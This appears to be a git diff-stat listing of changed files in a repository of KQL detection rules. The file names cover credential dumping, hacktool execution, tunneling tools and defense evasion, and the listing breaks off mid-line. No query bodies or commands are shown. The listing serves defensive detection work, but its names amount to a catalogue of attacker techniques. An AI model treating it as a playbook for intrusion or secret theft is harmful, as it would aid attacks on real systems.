.../execution_from_webserver_root_folder.kql | 24 +++++----- .../shell_context_menu_command_tampering.kql | 22 +++++----- ...ted_in_potentially_suspicious_location.kql | 26 +++++------ .../elevated_system_shell_spawned.kql | 18 ++++---- ...tion_of_an_executable_by_an_executable.kql | 26 +++++------ .../7zip_compressing_dump_files.kql | 24 +++++----- ...kerberos_coercion_via_dns_spn_spoofing.kql | 30 ++++++------- .../audio_capture_via_powershell.kql | 22 +++++----- .../audio_capture_via_soundrecorder.kql | 22 +++++----- .../automated_collection_command_prompt.kql | 18 ++++---- .../clipboard_collection_with_xclip_tool.kql | 24 +++++----- ...lipboard_data_collection_via_osascript.kql | 22 +++++----- ...h_password_for_exfiltration_with_7_zip.kql | 22 +++++----- ..._password_for_exfiltration_with_winzip.kql | 18 ++++---- .../compressed_file_creation_via_tar_exe.kql | 24 +++++----- ...compressed_file_extraction_via_tar_exe.kql | 24 +++++----- .../data_copied_to_clipboard_via_clip_exe.kql | 18 ++++---- .../esentutl_steals_browser_information.kql | 22 +++++----- ...iles_added_to_an_archive_using_rar_exe.kql | 22 +++++----- ...ous_output_via_compress_archive_cmdlet.kql | 20 ++++----- .../Collection/gui_input_capture_macos.kql | 22 +++++----- .../Collection/hacktool_adcspwn_execution.kql | 22 +++++----- .../hacktool_impacket_tools_execution.kql | 22 +++++----- ...ckup_for_system_registry_hives_enabled.kql | 24 +++++----- ...ential_smb_relay_attack_tool_execution.kql | 22 +++++----- ...tial_suspicious_activity_using_secedit.kql | 22 +++++----- ...owershell_get_clipboard_cmdlet_via_cli.kql | 18 ++++---- ...es_accessing_the_microphone_and_webcam.kql | 18 ++++---- ...ge_with_password_and_compression_level.kql | 24 +++++----- ...rmation_for_export_with_command_prompt.kql | 18 ++++---- .../screen_capture_activity_via_psr_exe.kql | 18 ++++---- KQL/rules/Collection/screen_capture_macos.kql | 22 +++++----- ...uspicious_camera_and_microphone_access.kql | 22 +++++----- ...lation_of_default_accounts_via_net_exe.kql | 22 +++++----- ...veeam_backup_database_suspicious_query.kql | 18 ++++---- ...tabase_credentials_dump_via_sqlcmd_exe.kql | 18 ++++---- ...ed_disableaidataanalysis_value_deleted.kql | 26 +++++------ ...indows_recall_feature_enabled_registry.kql | 26 +++++------ ...ows_recall_feature_enabled_via_reg_exe.kql | 28 ++++++------ .../winrar_compressing_dump_files.kql | 24 +++++----- ...inrar_execution_in_non_standard_folder.kql | 22 +++++----- ...i_cache_file_creation_by_uncommon_tool.kql | 22 +++++----- .../anydesk_temporary_artefact.kql | 26 +++++------ ...le_download_via_gfxdownloadwrapper_exe.kql | 18 ++++---- .../cloudflared_portable_execution.kql | 22 +++++----- .../cloudflared_quick_tunnel_execution.kql | 26 +++++------ ...cloudflared_tunnel_connections_cleanup.kql | 22 +++++----- .../cloudflared_tunnel_execution.kql | 22 +++++----- ...localtonet_tunneling_service_initiated.kql | 26 +++++------ ...onet_tunneling_service_initiated_linux.kql | 26 +++++------ .../curl_usage_on_linux.kql | 24 +++++----- ...entially_suspicious_directory_via_wget.kql | 18 ++++---- ..._download_and_execution_via_ieexec_exe.kql | 18 ++++---- ...ad_from_browser_process_via_inline_url.kql | 18 ++++---- ...nload_from_ip_based_url_via_certoc_exe.kql | 18 ++++---- ...ile_download_using_notepad_gup_utility.kql | 22 +++++----- .../file_download_via_certoc_exe.kql | 18 ++++---- .../finger_exe_execution.kql | 26 +++++------ ...assist_temporary_installation_artefact.kql | 26 +++++------ .../gzip_archive_decode_via_powershell.kql | 22 +++++----- .../hacktool_htran_natbypass_execution.kql | 18 ++++---- .../hacktool_inveigh_execution_artefacts.kql | 22 +++++----- ...b_relay_secrets_dump_module_indicators.kql | 22 +++++----- .../hacktool_sharpchisel_execution.kql | 22 +++++----- ...hacktool_silenttrinity_stager_dll_load.kql | 22 +++++----- ...acktool_silenttrinity_stager_execution.kql | 22 +++++----- ...ck_legit_rdp_session_to_move_laterally.kql | 22 +++++----- ...interchange_format_file_via_ldifde_exe.kql | 22 +++++----- .../installation_of_teamviewer_desktop.kql | 18 ++++---- ...ection_initiated_by_script_interpreter.kql | 22 +++++----- ...vestandaloneupdater_exe_proxy_download.kql | 20 ++++----- ...stsc_exe_execution_with_local_rdp_file.kql | 22 +++++----- ...m_process_located_in_suspicious_folder.kql | 22 +++++----- ...ication_initiated_to_portmap_io_domain.kql | 22 +++++----- ...k_connection_initiated_by_imewdbld_exe.kql | 18 ++++---- ...tially_suspicious_or_uncommon_location.kql | 18 ++++---- ...urewebsites_net_by_non_browser_process.kql | 18 ++++---- ...to_potential_dead_drop_resolver_domain.kql | 26 +++++------ ...ection_initiated_by_script_interpreter.kql | 22 +++++----- .../port_forwarding_activity_via_ssh_exe.kql | 22 +++++----- .../potential_amazon_ssm_agent_hijacking.kql | 22 +++++----- ...ownload_cradles_usage_process_creation.kql | 22 +++++----- ...nload_via_powershell_invoke_webrequest.kql | 18 ++++---- ...oad_upload_activity_using_type_command.kql | 18 ++++---- ...emory_download_and_compile_of_payloads.kql | 18 ++++---- ...ntial_linux_amazon_ssm_agent_hijacking.kql | 22 +++++----- .../potential_rdp_tunneling_via_plink.kql | 18 ++++---- .../potential_rdp_tunneling_via_ssh.kql | 18 ++++---- ...tential_wizardupdate_malware_infection.kql | 18 ++++---- .../potential_xcsset_malware_infection.kql | 18 ++++---- ...cious_network_connection_to_notion_api.kql | 22 +++++----- .../potentially_suspicious_usage_of_qemu.kql | 20 ++++----- .../printbrm_zip_creation_of_extraction.kql | 18 ++++---- .../pua_3proxy_execution.kql | 22 +++++----- .../pua_chisel_tunneling_tool_execution.kql | 22 +++++----- .../pua_fast_reverse_proxy_frp_execution.kql | 22 +++++----- .../pua_iox_tunneling_tool_execution.kql | 22 +++++----- .../pua_netcat_suspicious_execution.kql | 22 +++++----- .../pua_ngrok_execution.kql | 26 +++++------ .../pua_nimgrab_execution.kql | 22 +++++----- .../pua_nps_tunneling_tool_execution.kql | 22 +++++----- .../quickassist_execution.kql | 22 +++++----- .../rdp_over_reverse_ssh_tunnel.kql | 18 ++++---- .../rdp_to_http_or_https_target_ports.kql | 18 ++++---- .../remote_access_tool_anydesk_execution.kql | 26 +++++------ ...ydesk_execution_from_suspicious_folder.kql | 26 +++++------ ...ss_tool_anydesk_piped_password_via_cli.kql | 24 +++++----- ...ccess_tool_anydesk_silent_installation.kql | 22 +++++----- ...emote_access_tool_gotoassist_execution.kql | 26 +++++------ .../remote_access_tool_logmein_execution.kql | 26 +++++------ ...gent_command_execution_via_meshcentral.kql | 24 +++++----- ...emote_access_tool_netsupport_execution.kql | 26 +++++------ ...ol_potential_meshagent_execution_macos.kql | 26 +++++------ ..._potential_meshagent_execution_windows.kql | 26 +++++------ ...tool_renamed_meshagent_execution_macos.kql | 22 +++++----- ...ol_renamed_meshagent_execution_windows.kql | 22 +++++----- ...te_access_tool_screenconnect_execution.kql | 26 +++++------ ...al_suspicious_remote_command_execution.kql | 22 +++++----- ...mote_access_tool_simple_help_execution.kql | 26 +++++------ ...potentially_attacker_controlled_server.kql | 26 +++++------ ...mote_access_tool_ultraviewer_execution.kql | 26 +++++------ ...download_via_desktopimgdownldr_utility.kql | 18 ++++---- .../renamed_cloudflared_exe_execution.kql | 18 ++++---- ...ed_visual_studio_code_tunnel_execution.kql | 18 ++++---- ...e_code_tunnel_execution_file_indicator.kql | 18 ++++---- .../Command and Control/replace_exe_usage.kql | 18 ++++---- ...onnect_temporary_installation_artefact.kql | 26 +++++------ .../suspicious_binary_writes_via_anydesk.kql | 22 +++++----- ...suspicious_certreq_command_to_download.kql | 26 +++++------ ...d_process_of_manage_engine_servicedesk.kql | 22 +++++----- ...spicious_curl_change_user_agents_linux.kql | 24 +++++----- .../suspicious_curl_exe_download.kql | 18 ++++---- .../suspicious_desktopimgdownldr_command.kql | 22 +++++----- ...spicious_desktopimgdownldr_target_file.kql | 22 +++++----- ..._download_and_compress_into_a_cab_file.kql | 18 ++++---- ...suspicious_download_from_office_domain.kql | 22 +++++----- .../suspicious_dropbox_api_usage.kql | 22 +++++----- .../suspicious_extrac32_execution.kql | 18 ++++---- ...usage_on_gzip_archive_process_creation.kql | 22 +++++----- ...suspicious_invoke_webrequest_execution.kql | 18 ++++---- ...oke_webrequest_execution_with_directip.kql | 18 ++++---- ...stsc_exe_execution_with_local_rdp_file.kql | 22 +++++----- ..._network_communication_with_google_api.kql | 22 +++++----- ...etwork_communication_with_telegram_api.kql | 22 +++++----- .../suspicious_plink_port_forwarding.kql | 22 +++++----- .../suspicious_tscon_start_as_system.kql | 18 ++++---- .../suspicious_velociraptor_child_process.kql | 22 +++++----- .../teamviewer_remote_session.kql | 22 +++++----- .../tor_client_browser_execution.kql | 18 ++++---- ...k_connection_initiated_by_certutil_exe.kql | 20 ++++----- ...use_of_ultravnc_remote_access_software.kql | 22 +++++----- .../visual_studio_code_tunnel_execution.kql | 22 +++++----- ...tudio_code_tunnel_remote_file_creation.kql | 18 ++++---- ...tudio_code_tunnel_service_installation.kql | 22 +++++----- ...ual_studio_code_tunnel_shell_execution.kql | 22 +++++----- .../wget_creating_files_in_tmp_directory.kql | 22 +++++----- ...rency_wallets_by_uncommon_applications.kql | 30 ++++++------- ..._sysvol_files_by_uncommon_applications.kql | 18 ++++---- ..._history_file_by_uncommon_applications.kql | 20 ++++----- ...i_master_keys_by_uncommon_applications.kql | 20 ++++----- .../browser_started_with_remote_debugging.kql | 18 ++++---- .../capture_credentials_with_rpcping_exe.kql | 22 +++++----- .../certificate_exported_via_powershell.kql | 22 +++++----- ...mp_files_from_remote_share_via_cmd_exe.kql | 18 ++++---- .../copy_passwd_or_shadow_from_tmp_path.kql | 18 ++++---- ...g_sensitive_files_with_credential_data.kql | 22 +++++----- .../cred_dump_tools_dropped_files.kql | 22 +++++----- ...anager_access_by_uncommon_applications.kql | 24 +++++----- ...dentials_from_password_stores_keychain.kql | 22 +++++----- .../credentials_in_files.kql | 18 ++++---- .../credui_dll_loaded_by_uncommon_process.kql | 22 +++++----- ...ys_and_certificate_export_activity_ioc.kql | 22 +++++----- ...dumping_of_sensitive_hives_via_reg_exe.kql | 22 +++++----- .../dumping_process_via_sqldumper_exe.kql | 22 +++++----- ...umeration_for_3rd_party_creds_from_cli.kql | 18 ++++---- ...numeration_for_credentials_in_registry.kql | 22 +++++----- .../esentutl_gather_credentials.kql | 22 +++++----- ...entutl_volume_shadow_copy_service_keys.kql | 18 ++++---- ...ccess_of_signal_desktop_sensitive_data.kql | 28 ++++++------ .../findstr_gpp_passwords.kql | 18 ++++---- .../hacktool_crackmapexec_file_indicators.kql | 18 ++++---- ...hacktool_crackmapexec_process_patterns.kql | 18 ++++---- ...ol_dumpert_process_dumper_default_file.kql | 22 +++++----- ...ktool_dumpert_process_dumper_execution.kql | 22 +++++----- .../hacktool_execution_pe_metadata.kql | 22 +++++----- ...ool_hashcat_password_cracker_execution.kql | 22 +++++----- ...ol_hydra_password_bruteforce_execution.kql | 22 +++++----- .../hacktool_impacket_file_indicators.kql | 18 ++++---- .../hacktool_inveigh_execution.kql | 22 +++++----- .../hacktool_krbrelay_execution.kql | 22 +++++----- .../hacktool_lazagne_execution.kql | 24 +++++----- .../hacktool_mimikatz_execution.kql | 22 +++++----- .../hacktool_mimikatz_kirbi_file_creation.kql | 22 +++++----- .../hacktool_nppspy_hacktool_usage.kql | 18 ++++---- ...a_crackmapexec_or_impacket_secretsdump.kql | 18 ++++---- ..._pypykatz_credentials_dumping_activity.kql | 18 ++++---- .../hacktool_quarks_pwdump_execution.kql | 22 +++++----- .../hacktool_quarkspwdump_dump_file.kql | 18 ++++---- .../hacktool_remotekrbrelay_execution.kql | 22 +++++----- .../hacktool_safetykatz_dump_indicator.kql | 22 +++++----- .../hacktool_safetykatz_execution.kql | 22 +++++----- .../hacktool_securityxploded_execution.kql | 22 +++++----- ..._typical_hivenightmare_sam_file_export.kql | 22 +++++----- .../hacktool_winpwn_execution.kql | 18 ++++---- ...resting_service_enumeration_via_sc_exe.kql | 20 ++++----- ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 22 +++++----- ...ed_module_enumeration_via_tasklist_exe.kql | 22 +++++----- .../lsass_dump_keyword_in_commandline.kql | 22 +++++----- ...request_via_dumptype_registry_settings.kql | 22 +++++----- ...ess_dump_artefact_in_crashdumps_folder.kql | 22 +++++----- ...s_memory_dump_creation_via_taskmgr_exe.kql | 22 +++++----- .../lsass_process_memory_dump_files.kql | 18 ++++---- ...process_reconnaissance_via_findstr_exe.kql | 18 ++++---- ...soft_iis_connection_strings_decryption.kql | 18 ++++---- ...ft_iis_service_account_password_dumped.kql | 18 ++++---- ...e_file_access_by_uncommon_applications.kql | 18 ++++---- ...mount_execution_with_hidepid_parameter.kql | 18 ++++---- ...neric_credentials_added_via_cmdkey_exe.kql | 24 +++++----- .../Credential Access/ntds_dit_created.kql | 18 ++++---- ...it_creation_by_uncommon_parent_process.kql | 18 ++++---- .../ntds_dit_creation_by_uncommon_process.kql | 18 ++++---- .../ntds_exfiltration_filename_patterns.kql | 18 ++++---- ...uration_reconnaissance_via_findstr_exe.kql | 20 ++++----- .../potential_browser_data_stealing.kql | 22 +++++----- ..._attempt_using_new_networkprovider_cli.kql | 22 +++++----- ..._attempt_using_new_networkprovider_reg.kql | 22 +++++----- ...ential_dumping_via_lsass_process_clone.kql | 18 ++++---- ..._via_lsass_silentprocessexit_technique.kql | 22 +++++----- .../potential_credential_dumping_via_wer.kql | 22 +++++----- ..._sniffing_activity_using_network_tools.kql | 26 +++++------ ...istory_access_attempt_via_history_file.kql | 24 +++++----- ..._for_cached_credentials_via_cmdkey_exe.kql | 22 +++++----- .../potential_sam_database_dump.kql | 22 +++++----- ...tential_spn_enumeration_via_setspn_exe.kql | 22 +++++----- ...fender_av_bypass_via_dump64_exe_rename.kql | 20 ++++----- ...ommand_targeting_teams_sensitive_files.kql | 20 ++++----- ...con_activity_using_log_query_utilities.kql | 24 +++++----- ...ly_suspicious_jwt_token_search_via_cli.kql | 22 +++++----- ...ally_suspicious_odbc_driver_registered.kql | 22 +++++----- .../powershell_get_process_lsass.kql | 18 ++++---- .../Credential Access/powershell_sam_copy.kql | 24 +++++----- ...s_reconnaissance_via_commandline_tools.kql | 18 ++++---- ...rocess_memory_dump_via_rdrleakdiag_exe.kql | 22 +++++----- .../pua_dit_snapshot_viewer.kql | 22 +++++----- .../pua_mouse_lock_execution.kql | 22 +++++----- .../pua_webbrowserpassview_execution.kql | 22 +++++----- ...stry_export_of_third_party_credentials.kql | 20 ++++----- .../renamed_browsercore_exe_execution.kql | 18 ++++---- .../sensitive_file_dump_via_wbadmin_exe.kql | 24 +++++----- ...e_recovery_from_backup_via_wbadmin_exe.kql | 20 ++++----- ...tion_using_operating_systems_utilities.kql | 22 +++++----- ...sqlite_chromium_profile_data_db_access.kql | 18 ++++---- .../sqlite_firefox_profile_data_db_access.kql | 18 ++++---- ...e_access_to_browser_credential_storage.kql | 30 ++++++------- .../suspicious_history_file_operations.kql | 24 +++++----- .../suspicious_key_manager_access.kql | 22 +++++----- ...icious_process_patterns_ntds_dit_exfil.kql | 18 ++++---- .../suspicious_reg_add_open_command.kql | 18 ++++---- .../suspicious_serv_u_process_pattern.kql | 22 +++++----- ...uspicious_system_user_process_creation.kql | 26 +++++------ ...ious_sysvol_domain_group_policy_access.kql | 22 +++++----- ..._application_related_objectacess_event.kql | 18 ++++---- ...irectory_diagnostic_tool_ntdsutil_exe_.kql | 24 +++++----- ...shadowcopy_symlink_creation_via_mklink.kql | 22 +++++----- .../wce_wceaux_dll_access.kql | 18 ++++---- .../werfault_lsass_process_memory_dump.kql | 18 ++++---- .../windows_credential_editor_registry.kql | 18 ++++---- ...credential_manager_access_via_vaultcmd.kql | 18 ++++---- ...p_file_created_by_uncommon_application.kql | 18 ++++---- ...rivilege_by_arbitrary_parent_processes.kql | 18 ++++---- .../abusing_print_executable.kql | 18 ++++---- ...add_insecure_download_source_to_winget.kql | 24 +++++----- .../add_new_download_source_to_winget.kql | 22 +++++----- ...spicious_new_download_source_to_winget.kql | 18 ++++---- .../add_safeboot_keys_via_reg_utility.kql | 22 +++++----- ..._exe_execution_from_uncommon_directory.kql | 18 ++++---- ...tifier_deleted_by_uncommon_application.kql | 22 +++++----- .../agentexecutor_powershell_execution.kql | 22 +++++----- ...levated_msi_spawned_cmd_and_powershell.kql | 18 ++++---- ...ays_install_elevated_windows_installer.kql | 26 +++++------ .../amsi_dll_loaded_via_lolbin_process.kql | 18 ++++---- ...river_disallowed_on_dev_drive_registry.kql | 22 +++++----- ...r_csproj_code_execution_via_dotnet_exe.kql | 22 +++++----- ...bitrary_file_download_via_imewdbld_exe.kql | 18 ++++---- ...ary_file_download_via_msedge_proxy_exe.kql | 18 ++++---- ...bitrary_file_download_via_msohtmed_exe.kql | 18 ++++---- .../arbitrary_file_download_via_mspub_exe.kql | 18 ++++---- ...file_download_via_presentationhost_exe.kql | 18 ++++---- ...bitrary_file_download_via_squirrel_exe.kql | 22 +++++----- ...work_service_potential_dll_sideloading.kql | 18 ++++---- .../aspnetcompiler_execution.kql | 18 ++++---- ...sembly_loading_via_cl_loadassembly_ps1.kql | 18 ++++---- .../audit_policy_tampering_via_auditpol.kql | 24 +++++----- ...tampering_via_nt_resource_kit_auditpol.kql | 24 +++++----- .../audit_rules_deleted_via_auditctl.kql | 26 +++++------ ...bs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql | 22 +++++----- ...d_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql | 22 +++++----- .../baaupdate_exe_suspicious_dll_load.kql | 22 +++++----- ...cial_processes_with_improper_arguments.kql | 26 +++++------ ...64_encoded_powershell_command_detected.kql | 22 +++++----- .../Defense Evasion/binary_padding_macos.kql | 22 +++++----- .../bitlockertogo_exe_execution.kql | 28 ++++++------ .../browser_execution_in_headless_mode.kql | 18 ++++---- .../bypass_uac_via_fodhelper_exe.kql | 22 +++++----- .../c_il_code_compilation_via_ilasm_exe.kql | 18 ++++---- .../certificate_exported_via_certutil_exe.kql | 22 +++++----- ...channel_access_permission_via_registry.kql | 18 ++++---- .../chmod_suspicious_directory.kql | 22 +++++----- .../Defense Evasion/clear_linux_logs.kql | 22 +++++----- .../cmstp_execution_process_creation.kql | 22 +++++----- .../cmstp_execution_registry_event.kql | 22 +++++----- .../cobaltstrike_load_by_rundll32.kql | 18 ++++---- .../code_execution_via_pcwutl_dll.kql | 22 +++++----- ...ation_via_mode_com_to_russian_language.kql | 24 +++++----- .../com_object_execution_via_xwizard_exe.kql | 20 ++++----- .../Defense Evasion/connection_proxy.kql | 22 +++++----- ...urestring_cmdlet_usage_via_commandline.kql | 22 +++++----- .../createdump_process_dump.kql | 22 +++++----- .../creation_of_non_existent_system_dll.kql | 20 ++++----- .../curl_download_and_execute_combination.kql | 18 ++++---- ..._file_open_handler_executes_powershell.kql | 18 ++++---- .../decode_base64_encoded_text.kql | 22 +++++----- .../decode_base64_encoded_text_macos.kql | 22 +++++----- ...scan_shellex_context_menu_registry_key.kql | 22 +++++----- .../devicecredentialdeployment_execution.kql | 22 +++++----- ...launcher_exe_executes_specified_binary.kql | 22 +++++----- ...ibrary_sdiageng_dll_loaded_by_msdt_exe.kql | 18 ++++---- .../directory_removal_via_rmdir.kql | 24 +++++----- ...ore_mode_dsrm_registry_value_tampering.kql | 28 ++++++------ ...ministrative_share_creation_at_startup.kql | 18 ++++---- ...network_protection_on_windows_defender.kql | 18 ++++---- .../disable_macro_runtime_scan_scope.kql | 18 ++++---- ...crosoft_defender_firewall_via_registry.kql | 18 ++++---- .../disable_or_stop_services.kql | 22 +++++----- ...rivacy_settings_experience_in_registry.kql | 22 +++++----- ...ble_pua_protection_on_windows_defender.kql | 18 ++++---- .../disable_security_tools.kql | 22 +++++----- ..._tamper_protection_on_windows_defender.kql | 18 ++++---- ...indows_defender_av_security_monitoring.kql | 22 +++++----- ...nder_functionalities_via_registry_keys.kql | 24 +++++----- ...ble_windows_event_logging_via_registry.kql | 22 +++++----- .../disable_windows_firewall_by_registry.kql | 18 ++++---- .../disable_windows_iis_http_logging.kql | 18 ++++---- .../disabled_ie_security_features.kql | 18 ++++---- .../disabled_volume_snapshots.kql | 22 +++++----- .../disabled_windows_defender_eventlog.kql | 22 +++++----- .../disabling_security_tools.kql | 22 +++++----- ...der_wmi_autologger_session_via_reg_exe.kql | 26 +++++------ ...ion_from_potential_suspicious_location.kql | 22 +++++----- ...de_uncommon_script_extension_execution.kql | 24 +++++----- .../dism_remove_online_package.kql | 22 +++++----- ...splaying_hidden_files_feature_disabled.kql | 20 ++++----- .../dll_execution_via_rasautou_exe.kql | 22 +++++----- ...stem_process_from_suspicious_locations.kql | 18 ++++---- ...from_suspicious_location_via_cmspt_exe.kql | 22 +++++----- .../dll_loaded_via_certoc_exe.kql | 18 ++++---- .../dll_sideloading_of_shellchromeapi_dll.kql | 20 ++++----- ...erserver_function_call_via_msiexec_exe.kql | 18 ++++---- ...r_dll_loaded_by_scripting_applications.kql | 18 ++++---- ..._to_disallowed_images_in_hvci_registry.kql | 22 +++++----- ...iver_dll_installation_via_odbcconf_exe.kql | 22 +++++----- ...naries_into_spool_drivers_color_folder.kql | 18 ++++---- .../dumpminitool_execution.kql | 18 ++++---- .../dumpstack_log_defender_evasion.kql | 18 ++++---- .../dynamic_csharp_compile_artefact.kql | 22 +++++----- .../dynamic_net_compilation_via_csc_exe.kql | 26 +++++------ ...ocal_manifest_installation_with_winget.kql | 22 +++++----- ...nymous_computer_allowanonymouscallback.kql | 22 +++++----- ...syslog_configuration_change_via_esxcli.kql | 22 +++++----- ...amper_in_net_processes_via_commandline.kql | 24 +++++----- .../etw_trace_evasion_activity.kql | 18 ++++---- .../eventlog_evtx_file_deleted.kql | 18 ++++---- .../evtx_created_in_uncommon_location.kql | 28 ++++++------ ...ange_powershell_cmdlet_history_deleted.kql | 22 +++++----- .../execute_files_with_msdeploy_exe.kql | 22 +++++----- .../execute_from_alternate_data_streams.kql | 18 ++++---- ...execute_pcwrun_exe_to_leverage_follina.kql | 22 +++++----- .../execution_dll_of_choice_using_wab_exe.kql | 18 ++++---- .../execution_of_non_existing_file.kql | 18 ++++---- ...tion_of_suspicious_file_type_extension.kql | 20 ++++----- .../execution_via_stordiag_exe.kql | 22 +++++----- .../execution_via_workfolders_exe.kql | 22 +++++----- .../explorer_process_tree_break.kql | 20 ++++----- ...coded_from_base64_hex_via_certutil_exe.kql | 18 ++++---- .../file_deleted_via_sysinternals_sdelete.kql | 22 +++++----- KQL/rules/Defense Evasion/file_deletion.kql | 22 +++++----- .../Defense Evasion/file_deletion_via_del.kql | 28 ++++++------ ...ile_download_using_protocolhandler_exe.kql | 18 ++++---- .../file_download_via_bitsadmin.kql | 22 +++++----- ...itsadmin_to_a_suspicious_target_folder.kql | 18 ++++---- ...bitsadmin_to_an_uncommon_target_folder.kql | 18 ++++---- .../file_download_via_installutil_exe.kql | 18 ++++---- .../file_download_via_nscurl_macos.kql | 22 +++++----- ...load_via_windows_defender_mpcmprun_exe.kql | 18 ++++---- .../file_download_with_headless_browser.kql | 18 ++++---- ...ile_encoded_to_base64_via_certutil_exe.kql | 22 +++++----- ...ion_encoded_to_base64_via_certutil_exe.kql | 18 ++++---- .../file_time_attribute_change.kql | 18 ++++---- ...ous_extension_downloaded_via_bitsadmin.kql | 18 ++++---- ...stem_dll_name_in_unsuspected_locations.kql | 24 +++++----- ..._process_name_in_unsuspected_locations.kql | 26 +++++------ .../filter_driver_unloaded_via_fltmc_exe.kql | 18 ++++---- .../findstr_launching_lnk_file.kql | 18 ++++---- .../firewall_disabled_via_netsh_exe.kql | 22 +++++----- .../firewall_rule_deleted_via_netsh_exe.kql | 24 +++++----- .../firewall_rule_update_via_netsh_exe.kql | 24 +++++----- .../flush_iptables_ufw_chain.kql | 22 +++++----- ...t_guard_protectedfolders_list_registry.kql | 22 +++++----- ...orfiles_exe_child_process_masquerading.kql | 18 ++++---- .../fsutil_suspicious_invocation.kql | 26 +++++------ .../gatekeeper_bypass_via_xattr.kql | 22 +++++----- .../Defense Evasion/gpscript_execution.kql | 22 +++++----- .../greedy_file_deletion_using_del.kql | 18 ++++---- .../hacktool_edrsilencer_execution.kql | 22 +++++----- .../hacktool_empire_powershell_uac_bypass.kql | 18 ++++---- .../hacktool_f_secure_c3_load_by_rundll32.kql | 18 ++++---- ...rootkit_detector_and_remover_execution.kql | 22 +++++----- .../hacktool_krbrelayup_execution.kql | 22 +++++----- .../hacktool_powertool_execution.kql | 22 +++++----- .../hacktool_rubeus_execution.kql | 22 +++++----- .../hacktool_sharpevtmute_execution.kql | 18 ++++---- ...ool_wmiexec_default_powershell_command.kql | 22 +++++----- .../hacktool_xordump_execution.kql | 22 +++++----- .../Defense Evasion/hh_exe_execution.kql | 22 +++++----- ...et_on_file_directory_via_chflags_macos.kql | 24 +++++----- .../Defense Evasion/hidden_user_creation.kql | 22 +++++----- ...e_schedule_task_via_index_value_tamper.kql | 24 +++++----- .../hiding_files_with_attrib_exe.kql | 24 +++++----- ...count_via_specialaccounts_registry_key.kql | 18 ++++---- ...ecialaccounts_registry_key_commandline.kql | 22 +++++----- ...l_help_hh_exe_suspicious_child_process.kql | 18 ++++---- ...visor_enforced_code_integrity_disabled.kql | 18 ++++---- ...r_enforced_paging_translation_disabled.kql | 18 ++++---- ..._to_mycomputer_zone_for_http_protocols.kql | 18 ++++---- .../iis_webserver_access_logs_deleted.kql | 24 +++++----- ...log_deletion_via_commandline_utilities.kql | 26 +++++------ ...devices_unusual_parent_child_processes.kql | 18 ++++---- ..._removal_on_host_clear_mac_system_logs.kql | 22 +++++----- ...cution_by_program_compatibility_wizard.kql | 24 +++++----- ...xecution_from_script_file_via_bash_exe.kql | 20 ++++----- ..._inline_command_execution_via_bash_exe.kql | 20 ++++----- .../infdefaultinstall_exe_inf_execution.kql | 18 ++++---- ...itive_subfolder_search_via_findstr_exe.kql | 22 +++++----- ..._new_package_via_winget_local_manifest.kql | 26 +++++------ .../install_root_certificate.kql | 22 +++++----- ...lorer_disablefirstruncustomize_enabled.kql | 22 +++++----- .../invoke_obfuscation_clip_launcher.kql | 18 ++++---- ...nvoke_obfuscation_compress_obfuscation.kql | 18 ++++---- ..._obfuscation_obfuscated_iex_invocation.kql | 18 ++++---- .../invoke_obfuscation_stdin_launcher.kql | 18 ++++---- .../invoke_obfuscation_var_launcher.kql | 18 ++++---- ...e_obfuscation_var_launcher_obfuscation.kql | 18 ++++---- .../invoke_obfuscation_via_stdin.kql | 18 ++++---- .../invoke_obfuscation_via_use_clip.kql | 18 ++++---- .../invoke_obfuscation_via_use_mshta.kql | 18 ++++---- .../jscript_compiler_execution.kql | 24 +++++----- ...kavremover_dropped_binary_lolbin_usage.kql | 18 ++++---- .../kernel_memory_dump_via_livekd.kql | 22 +++++----- .../launch_vsdevshell_ps1_proxy_execution.kql | 22 +++++----- ...legitimate_application_dropped_archive.kql | 18 ++++---- ...itimate_application_dropped_executable.kql | 18 ++++---- .../legitimate_application_dropped_script.kql | 18 ++++---- .../linux_base64_encoded_pipe_to_shell.kql | 22 +++++----- .../linux_base64_encoded_shebang_in_cli.kql | 22 +++++----- .../linux_doas_conf_file_creation.kql | 22 +++++----- .../linux_doas_tool_execution.kql | 22 +++++----- .../linux_package_uninstall.kql | 22 +++++----- .../linux_shell_pipe_to_shell.kql | 22 +++++----- .../livekd_driver_creation.kql | 22 +++++----- ...kd_driver_creation_by_uncommon_process.kql | 22 +++++----- ...livekd_kernel_memory_dump_file_created.kql | 22 +++++----- ...ol_binary_copied_from_system_directory.kql | 18 ++++---- .../lolbin_runexehelper_use_as_proxy.kql | 18 ++++---- .../lolbin_unregmp2_exe_use_as_proxy.kql | 18 ++++---- ...sa_ppl_protection_disabled_via_reg_exe.kql | 22 +++++----- ...on_by_microsoft_visual_studio_debugger.kql | 26 +++++------ ...nents_file_execution_by_taef_detection.kql | 24 +++++----- ...inject_inject_dll_into_running_process.kql | 18 ++++---- .../maxmpxct_registry_value_changed.kql | 22 +++++----- .../microsoft_office_dll_sideload.kql | 22 +++++----- ...crosoft_office_protected_view_disabled.kql | 22 +++++----- .../modify_group_policy_settings.kql | 22 +++++----- .../msdt_execution_via_answer_file.kql | 22 +++++----- ...cution_with_suspicious_file_extensions.kql | 28 ++++++------ ...ll_runhtmlapplication_suspicious_usage.kql | 22 +++++----- .../msiexec_quiet_installation.kql | 24 +++++----- .../Defense Evasion/msiexec_web_install.kql | 22 +++++----- .../Defense Evasion/msxsl_exe_execution.kql | 24 +++++----- ..._policy_on_microsoft_defender_firewall.kql | 22 +++++----- ..._connection_initiated_by_addinutil_exe.kql | 20 ++++----- ...capture_session_launched_via_dxcap_exe.kql | 22 +++++----- .../new_dll_registered_via_odbcconf_exe.kql | 22 +++++----- .../new_file_association_using_exefile.kql | 18 ++++---- .../new_firewall_rule_added_via_netsh_exe.kql | 24 +++++----- .../new_process_created_via_taskmgr_exe.kql | 22 +++++----- ..._certificate_installed_via_certmgr_exe.kql | 24 +++++----- ...certificate_installed_via_certutil_exe.kql | 24 +++++----- .../node_process_executions.kql | 18 ++++---- ...rshell_download_cradle_processcreation.kql | 18 ++++---- .../ntdllpipe_like_activity_execution.kql | 18 ++++---- ...l_msi_install_via_windowsinstaller_com.kql | 26 +++++------ ...fuscated_powershell_oneliner_execution.kql | 18 ++++---- .../odbcconf_exe_suspicious_dll_location.kql | 22 +++++----- ...network_connection_over_uncommon_ports.kql | 22 +++++----- ...tls1_0_tls1_1_protocol_version_enabled.kql | 22 +++++----- ...nt_file_dropped_in_suspicious_location.kql | 22 +++++----- ...xecution_of_malicious_embedded_scripts.kql | 24 +++++----- ...openwith_exe_executes_specified_binary.kql | 